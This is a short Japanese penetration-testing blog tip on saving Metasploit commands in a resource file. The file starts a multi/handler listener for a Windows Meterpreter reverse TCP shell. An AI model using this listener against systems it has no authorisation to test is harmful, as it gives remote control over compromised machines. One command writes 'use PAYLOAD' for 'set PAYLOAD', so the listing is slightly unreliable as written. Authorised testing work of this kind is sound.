とある親父の侵入実験【便利技】

ペネトレーションテストなどをやっていると、何度も繰り返し侵入してみたりする。その度に待ち受け用のHandlerを指定したりするのも結構手間である。

そこで、手抜き技と言うかMetasploitの便利な仕組みとしてのリソースファイルを活用する。このリソースファイルは、ただコマンドをテキストに書き連ねただけでそれを呼び出して実行しているだけ。

例えば、よく使うHandlerのリソースファイルならこんな感じに・・・

　root@kali:~# touch handler.rc
　root@kali:~# echo use exploit/multi/handler >> handler.rc
　root@kali:~# echo use PAYLOAD windows/meterpreter/reverse_tcp >> handler.rc
　root@kali:~# echo set LHOST 172.16.120.1 >> handler.rc
　root@kali:~# echo set ExitOnSession false >> handler.rc
　root@kali:~# echo exploit -j -z >> handler.rc

これでHandler.rcというファイルに必要な手順が書き込まれる。

使用する時は以下の要領で実行

Metasploit起動前

　root@kali:~# msfconsole -r handler.rc

Metasploit起動後

　msf > resource handler.rc

このリソースファイルは、他にも活用する場面があると思うので書き残しておく。